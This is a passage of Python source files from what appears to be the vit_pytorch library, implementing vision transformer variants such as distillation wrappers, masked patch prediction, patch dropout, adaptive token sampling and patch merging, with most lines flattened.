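        # `depth` must be a per-stage tuple; `heads` and `window_size` may be scalars,
        # in which case they are broadcast to every stage via cast_tuple below.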
): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (channels, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) strides = (4, *((2,) * (num_stages - 1))) hyperparams_per_stage = [heads, window_size] hyperparams_per_stage = list(map(partial(cast_tuple, length = num_stages), hyperparams_per_stage)) assert all(tuple(map(lambda arr: len(arr) == num_stages, hyperparams_per_stage))) self.layers = nn.ModuleList([]) for ind, ((layer_dim_in, layer_dim), layer_depth, layer_stride, layer_heads, layer_window_size) in enumerate(zip(dim_pairs, depth, strides, *hyperparams_per_stage)): is_last = ind == (num_stages - 1) self.layers.append(nn.ModuleList([ OverlappingPatchEmbed(layer_dim_in, layer_dim, stride = layer_stride), PEG(layer_dim), Transformer(dim = layer_dim, depth = layer_depth, heads = layer_heads, ff_mult = ff_mult, dropout = dropout, norm_output = not is_last), ])) self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): for ope, peg, transformer in self.layers: x = ope(x) x = peg(x) x = transformer(x) return self.mlp_head(x) File: vit_pytorch/distill.py import torch from torch import nn from torch.nn import Module import torch.nn.functional as F from vit_pytorch.vit import ViT from vit_pytorch.t2t import T2TViT from vit_pytorch.efficient import ViT as EfficientViT from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d # classes class DistillMixin: def forward(self, img, distill_token = None): distilling = exists(distill_token) x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim = 1) x += self.pos_embedding[:, :(n + 1)] if distilling: distill_tokens = repeat(distill_token, '1 n d -> b n d', b = b) x = torch.cat((x, distill_tokens), dim = 1) x = self._attend(x) if distilling: x, distill_tokens = x[:, :-1], x[:, -1] x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) out = self.mlp_head(x) if distilling: return out, distill_tokens return out class DistillableViT(DistillMixin, ViT): def __init__(self, *args, **kwargs): super(DistillableViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = ViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) return v def _attend(self, x): x = self.dropout(x) x = self.transformer(x) return x class DistillableT2TViT(DistillMixin, T2TViT): def __init__(self, *args, **kwargs): super(DistillableT2TViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = T2TViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) return v def _attend(self, x): x = self.dropout(x) x = self.transformer(x) return x class DistillableEfficientViT(DistillMixin, EfficientViT): def __init__(self, *args, **kwargs): super(DistillableEfficientViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = EfficientViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) 
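        # Rebuild a plain (non-distillable) EfficientViT with identical hyperparameters and copy the
        # trained weights over, so the model can be used without the distillation token.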
return v def _attend(self, x): return self.transformer(x) # knowledge distillation wrapper class DistillWrapper(Module): def __init__( self, *, teacher, student, temperature = 1., alpha = 0.5, hard = False, mlp_layernorm = False ): super().__init__() assert (isinstance(student, (DistillableViT, DistillableT2TViT, DistillableEfficientViT))) , 'student must be a vision transformer' self.teacher = teacher self.student = student dim = student.dim num_classes = student.num_classes self.temperature = temperature self.alpha = alpha self.hard = hard self.distillation_token = nn.Parameter(torch.randn(1, 1, dim)) self.distill_mlp = nn.Sequential( nn.LayerNorm(dim) if mlp_layernorm else nn.Identity(), nn.Linear(dim, num_classes) ) def forward(self, img, labels, temperature = None, alpha = None, **kwargs): alpha = default(alpha, self.alpha) T = default(temperature, self.temperature) with torch.no_grad(): teacher_logits = self.teacher(img) student_logits, distill_tokens = self.student(img, distill_token = self.distillation_token, **kwargs) distill_logits = self.distill_mlp(distill_tokens) loss = F.cross_entropy(student_logits, labels) if not self.hard: distill_loss = F.kl_div( F.log_softmax(distill_logits / T, dim = -1), F.softmax(teacher_logits / T, dim = -1).detach(), reduction = 'batchmean') distill_loss *= T ** 2 else: teacher_labels = teacher_logits.argmax(dim = -1) distill_loss = F.cross_entropy(distill_logits, teacher_labels) return loss * (1 - alpha) + distill_loss * alpha File: vit_pytorch/mpp.py import math import torch from torch import nn import torch.nn.functional as F from einops import rearrange, repeat, reduce # helpers def exists(val): return val is not None def prob_mask_like(t, prob): batch, seq_length, _ = t.shape return torch.zeros((batch, seq_length)).float().uniform_(0, 1) < prob def get_mask_subset_with_prob(patched_input, prob): batch, seq_len, _, device = *patched_input.shape, patched_input.device max_masked = math.ceil(prob * seq_len) rand = torch.rand((batch, seq_len), device=device) _, sampled_indices = rand.topk(max_masked, dim=-1) new_mask = torch.zeros((batch, seq_len), device=device) new_mask.scatter_(1, sampled_indices, 1) return new_mask.bool() # mpp loss class MPPLoss(nn.Module): def __init__( self, patch_size, channels, output_channel_bits, max_pixel_val, mean, std ): super().__init__() self.patch_size = patch_size self.channels = channels self.output_channel_bits = output_channel_bits self.max_pixel_val = max_pixel_val self.mean = torch.tensor(mean).view(-1, 1, 1) if mean else None self.std = torch.tensor(std).view(-1, 1, 1) if std else None def forward(self, predicted_patches, target, mask): p, c, mpv, bits, device = self.patch_size, self.channels, self.max_pixel_val, self.output_channel_bits, target.device bin_size = mpv / (2 ** bits) # un-normalize input if exists(self.mean) and exists(self.std): target = target * self.std + self.mean # reshape target to patches target = target.clamp(max = mpv) # clamp just in case avg_target = reduce(target, 'b c (h p1) (w p2) -> b (h w) c', 'mean', p1 = p, p2 = p).contiguous() channel_bins = torch.arange(bin_size, mpv, bin_size, device = device) discretized_target = torch.bucketize(avg_target, channel_bins) bin_mask = (2 ** bits) ** torch.arange(0, c, device = device).long() bin_mask = rearrange(bin_mask, 'c -> () () c') target_label = torch.sum(bin_mask * discretized_target, dim = -1) loss = F.cross_entropy(predicted_patches[mask], target_label[mask]) return loss # main class class MPP(nn.Module): def __init__( self, 
transformer, patch_size, dim, output_channel_bits=3, channels=3, max_pixel_val=1.0, mask_prob=0.15, replace_prob=0.5, random_patch_prob=0.5, mean=None, std=None ): super().__init__() self.transformer = transformer self.loss = MPPLoss(patch_size, channels, output_channel_bits, max_pixel_val, mean, std) # extract patching function self.patch_to_emb = nn.Sequential(transformer.to_patch_embedding[1:]) # output transformation self.to_bits = nn.Linear(dim, 2**(output_channel_bits * channels)) # vit related dimensions self.patch_size = patch_size # mpp related probabilities self.mask_prob = mask_prob self.replace_prob = replace_prob self.random_patch_prob = random_patch_prob # token ids self.mask_token = nn.Parameter(torch.randn(1, 1, channels * patch_size ** 2)) def forward(self, input, **kwargs): transformer = self.transformer # clone original image for loss img = input.clone().detach() # reshape raw image to patches p = self.patch_size input = rearrange(input, 'b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1=p, p2=p) mask = get_mask_subset_with_prob(input, self.mask_prob) # mask input with mask patches with probability of `replace_prob` (keep patches the same with probability 1 - replace_prob) masked_input = input.clone().detach() # if random token probability > 0 for mpp if self.random_patch_prob > 0: random_patch_sampling_prob = self.random_patch_prob / ( 1 - self.replace_prob) random_patch_prob = prob_mask_like(input, random_patch_sampling_prob).to(mask.device) bool_random_patch_prob = mask * (random_patch_prob == True) random_patches = torch.randint(0, input.shape[1], (input.shape[0], input.shape[1]), device=input.device) randomized_input = masked_input[ torch.arange(masked_input.shape[0]).unsqueeze(-1), random_patches] masked_input[bool_random_patch_prob] = randomized_input[ bool_random_patch_prob] # [mask] input replace_prob = prob_mask_like(input, self.replace_prob).to(mask.device) bool_mask_replace = (mask * replace_prob) == True masked_input[bool_mask_replace] = self.mask_token # linear embedding of patches masked_input = self.patch_to_emb(masked_input) # add cls token to input sequence b, n, _ = masked_input.shape cls_tokens = repeat(transformer.cls_token, '() n d -> b n d', b=b) masked_input = torch.cat((cls_tokens, masked_input), dim=1) # add positional embeddings to input masked_input += transformer.pos_embedding[:, :(n + 1)] masked_input = transformer.dropout(masked_input) # get generator output and get mpp loss masked_input = transformer.transformer(masked_input, **kwargs) cls_logits = self.to_bits(masked_input) logits = cls_logits[:, 1:, :] mpp_loss = self.loss(logits, img, mask) return mpp_loss File: vit_pytorch/vit_with_patch_dropout.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class PatchDropout(nn.Module): def __init__(self, prob): super().__init__() assert 0 <= prob < 1. self.prob = prob def forward(self, x): if not self.training or self.prob == 0.: return x b, n, _, device = *x.shape, x.device batch_indices = torch.arange(b, device = device) batch_indices = rearrange(batch_indices, '... -> ... 
1') num_patches_keep = max(1, int(n * (1 - self.prob))) patch_indices_keep = torch.randn(b, n, device = device).topk(num_patches_keep, dim = -1).indices return x[batch_indices, patch_indices_keep] class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., patch_dropout = 0.25): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
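# Illustrative sketch (hypothetical numbers, not from the source): with image_size = 224,
# patch_size = 16 and the default patch_dropout = 0.25, the grid is 224 // 16 = 14 patches
# per side, so num_patches = 14 * 14 = 196 and patch_dim = 3 * 16 * 16 = 768; during
# training the PatchDropout module above then keeps max(1, int(196 * (1 - 0.25))) = 147
# randomly chosen patch tokens before the CLS token is prepended.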
num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.Linear(patch_dim, dim), ) self.pos_embedding = nn.Parameter(torch.randn(num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.patch_dropout = PatchDropout(patch_dropout) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding x = self.patch_dropout(x) cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/parallel_vit.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class Parallel(nn.Module): def __init__(self, *fns): super().__init__() self.fns = nn.ModuleList(fns) def forward(self, x): return sum([fn(x) for fn in self.fns]) class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, num_parallel_branches = 2, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) attn_block = lambda: Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout) ff_block = lambda: FeedForward(dim, mlp_dim, dropout = dropout) for _ in range(depth): self.layers.append(nn.ModuleList([ Parallel(*[attn_block() for _ in range(num_parallel_branches)]), Parallel(*[ff_block() for _ in range(num_parallel_branches)]), ])) def forward(self, x): for attns, ffs in self.layers: x = attns(x) + x x = ffs(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', num_parallel_branches = 2, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 
0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.Linear(patch_dim, dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, num_parallel_branches, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/ats_vit.py import torch import torch.nn.functional as F from torch.nn.utils.rnn import pad_sequence from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # adaptive token sampling functions and classes def log(t, eps = 1e-6): return torch.log(t + eps) def sample_gumbel(shape, device, dtype, eps = 1e-6): u = torch.empty(shape, device = device, dtype = dtype).uniform_(0, 1) return -log(-log(u, eps), eps) def batched_index_select(values, indices, dim = 1): value_dims = values.shape[(dim + 1):] values_shape, indices_shape = map(lambda t: list(t.shape), (values, indices)) indices = indices[(..., *((None,) * len(value_dims)))] indices = indices.expand(*((-1,) * len(indices_shape)), *value_dims) value_expand_len = len(indices_shape) - (dim + 1) values = values[(*((slice(None),) * dim), *((None,) * value_expand_len), ...)] value_expand_shape = [-1] * len(values.shape) expand_slice = slice(dim, (dim + value_expand_len)) value_expand_shape[expand_slice] = indices.shape[expand_slice] values = values.expand(*value_expand_shape) dim += value_expand_len return values.gather(dim, indices) class AdaptiveTokenSampling(nn.Module): def __init__(self, output_num_tokens, eps = 1e-6): super().__init__() self.eps = eps self.output_num_tokens = output_num_tokens def forward(self, attn, value, mask): heads, output_num_tokens, eps, device, dtype = attn.shape[1], self.output_num_tokens, self.eps, attn.device, attn.dtype # first get the attention values for CLS token to all other tokens cls_attn = attn[..., 0, 1:] # calculate the norms of the values, for weighting the scores, as described in the paper value_norms = value[..., 1:, :].norm(dim = -1) # weigh the attention scores by the norm of the values, sum across all heads cls_attn = einsum('b h n, b h n -> b n', cls_attn, value_norms) # normalize to 1 normed_cls_attn = cls_attn / (cls_attn.sum(dim = -1, keepdim = True) + eps) # instead of using inverse transform sampling, going to invert the softmax and use gumbel-max sampling instead 
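# Explanatory note on the Gumbel-max trick used just below: argmax_i(log p_i + g_i), with
# each g_i drawn independently from Gumbel(0, 1), returns index i with probability p_i.
# sample_gumbel produces g = -log(-log(u)) for u ~ Uniform(0, 1), so adding it to the
# log of the normalized CLS attention scores and taking argmax samples tokens in
# proportion to those scores, without needing inverse-CDF sampling.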
pseudo_logits = log(normed_cls_attn) # mask out pseudo logits for gumbel-max sampling mask_without_cls = mask[:, 1:] mask_value = -torch.finfo(attn.dtype).max / 2 pseudo_logits = pseudo_logits.masked_fill(~mask_without_cls, mask_value) # expand k times, k being the adaptive sampling number pseudo_logits = repeat(pseudo_logits, 'b n -> b k n', k = output_num_tokens) pseudo_logits = pseudo_logits + sample_gumbel(pseudo_logits.shape, device = device, dtype = dtype) # gumble-max and add one to reserve 0 for padding / mask sampled_token_ids = pseudo_logits.argmax(dim = -1) + 1 # calculate unique using torch.unique and then pad the sequence from the right unique_sampled_token_ids_list = [torch.unique(t, sorted = True) for t in torch.unbind(sampled_token_ids)] unique_sampled_token_ids = pad_sequence(unique_sampled_token_ids_list, batch_first = True) # calculate the new mask, based on the padding new_mask = unique_sampled_token_ids != 0 # CLS token never gets masked out (gets a value of True) new_mask = F.pad(new_mask, (1, 0), value = True) # prepend a 0 token id to keep the CLS attention scores unique_sampled_token_ids = F.pad(unique_sampled_token_ids, (1, 0), value = 0) expanded_unique_sampled_token_ids = repeat(unique_sampled_token_ids, 'b n -> b h n', h = heads) # gather the new attention scores new_attn = batched_index_select(attn, expanded_unique_sampled_token_ids, dim = 2) # return the sampled attention scores, new mask (denoting padding), as well as the sampled token indices (for the residual) return new_attn, new_mask, unique_sampled_token_ids # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., output_num_tokens = None): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.output_num_tokens = output_num_tokens self.ats = AdaptiveTokenSampling(output_num_tokens) if exists(output_num_tokens) else None self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, *, mask): num_tokens = x.shape[1] x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale if exists(mask): dots_mask = rearrange(mask, 'b i -> b 1 i 1') * rearrange(mask, 'b j -> b 1 1 j') mask_value = -torch.finfo(dots.dtype).max dots = dots.masked_fill(~dots_mask, mask_value) attn = self.attend(dots) attn = self.dropout(attn) sampled_token_ids = None # if adaptive token sampling is enabled # and number of tokens is greater than the number of output tokens if exists(self.output_num_tokens) and (num_tokens - 1) > self.output_num_tokens: attn, mask, sampled_token_ids = self.ats(attn, v, mask = mask) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out), mask, sampled_token_ids class Transformer(nn.Module): def __init__(self, dim, depth, max_tokens_per_depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() assert len(max_tokens_per_depth) == depth, 
'max_tokens_per_depth must be a tuple of length that is equal to the depth of the transformer' assert sorted(max_tokens_per_depth, reverse = True) == list(max_tokens_per_depth), 'max_tokens_per_depth must be in decreasing order' assert min(max_tokens_per_depth) > 0, 'max_tokens_per_depth must have at least 1 token at any layer' self.layers = nn.ModuleList([]) for _, output_num_tokens in zip(range(depth), max_tokens_per_depth): self.layers.append(nn.ModuleList([ Attention(dim, output_num_tokens = output_num_tokens, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): b, n, device = *x.shape[:2], x.device # use mask to keep track of the paddings when sampling tokens # as the duplicates (when sampling) are just removed, as mentioned in the paper mask = torch.ones((b, n), device = device, dtype = torch.bool) token_ids = torch.arange(n, device = device) token_ids = repeat(token_ids, 'n -> b n', b = b) for attn, ff in self.layers: attn_out, mask, sampled_token_ids = attn(x, mask = mask) # when token sampling, one needs to then gather the residual tokens with the sampled token ids if exists(sampled_token_ids): x = batched_index_select(x, sampled_token_ids, dim = 1) token_ids = batched_index_select(token_ids, sampled_token_ids, dim = 1) x = x + attn_out x = ff(x) + x return x, token_ids class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, max_tokens_per_depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
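# Illustrative sketch (hypothetical numbers, not from the source): with image_size = 224
# and patch_size = 16 the model starts from 14 * 14 = 196 patch tokens plus one CLS token;
# a schedule such as max_tokens_per_depth = (256, 128, 64, 32, 16, 8) for depth = 6 means
# sampling is skipped at layers whose budget already covers the current token count, and
# otherwise AdaptiveTokenSampling keeps at most that many non-CLS tokens for later layers.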
num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, max_tokens_per_depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img, return_sampled_token_ids = False): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x, token_ids = self.transformer(x) logits = self.mlp_head(x[:, 0]) if return_sampled_token_ids: # remove CLS token and decrement by 1 to make -1 the padding token_ids = token_ids[:, 1:] - 1 return logits, token_ids return logits File: vit_pytorch/vit_with_patch_merger.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val ,d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # patch merger class class PatchMerger(nn.Module): def __init__(self, dim, num_tokens_out): super().__init__() self.scale = dim ** -0.5 self.norm = nn.LayerNorm(dim) self.queries = nn.Parameter(torch.randn(num_tokens_out, dim)) def forward(self, x): x = self.norm(x) sim = torch.matmul(self.queries, x.transpose(-1, -2)) * self.scale attn = sim.softmax(dim = -1) return torch.matmul(attn, x) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., patch_merge_layer = None, patch_merge_num_tokens = 8): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) self.patch_merge_layer_index = default(patch_merge_layer, depth // 2) - 1 # default to mid-way through transformer, as shown in paper self.patch_merger = PatchMerger(dim = dim, num_tokens_out = patch_merge_num_tokens) for _ in range(depth): 
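# Explanatory note: each iteration appends one (Attention, FeedForward) pair; with the
# default patch_merge_layer = None and a hypothetical depth = 12, patch_merge_layer_index
# works out to 12 // 2 - 1 = 5, so in forward() the PatchMerger runs after the 6th block
# and shrinks the sequence to patch_merge_num_tokens (8 by default) learned tokens.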
self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for index, (attn, ff) in enumerate(self.layers): x = attn(x) + x x = ff(x) + x if index == self.patch_merge_layer_index: x = self.patch_merger(x) return self.norm(x) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, patch_merge_layer = None, patch_merge_num_tokens = 8, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout, patch_merge_layer, patch_merge_num_tokens) self.mlp_head = nn.Sequential( Reduce('b n d -> b d', 'mean'), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding[:, :n] x = self.dropout(x) x = self.transformer(x) return self.mlp_head(x) File: vit_pytorch/t2t.py import math import torch from torch import nn from vit_pytorch.vit import Transformer from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def conv_output_size(image_size, kernel_size, stride, padding): return int(((image_size - kernel_size + (2 * padding)) / stride) + 1) # classes class RearrangeImage(nn.Module): def forward(self, x): return rearrange(x, 'b (h w) c -> b c h w', h = int(math.sqrt(x.shape[1]))) # main class class T2TViT(nn.Module): def __init__(self, *, image_size, num_classes, dim, depth = None, heads = None, mlp_dim = None, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., transformer = None, t2t_layers = ((7, 4), (3, 2), (3, 2))): super().__init__() assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' layers = [] layer_dim = channels output_image_size = image_size for i, (kernel_size, stride) in enumerate(t2t_layers): layer_dim *= kernel_size ** 2 is_first = i == 0 is_last = i == (len(t2t_layers) - 1) output_image_size = conv_output_size(output_image_size, kernel_size, stride, stride // 2) layers.extend([ RearrangeImage() if not is_first else nn.Identity(), nn.Unfold(kernel_size = kernel_size, stride = stride, padding = stride 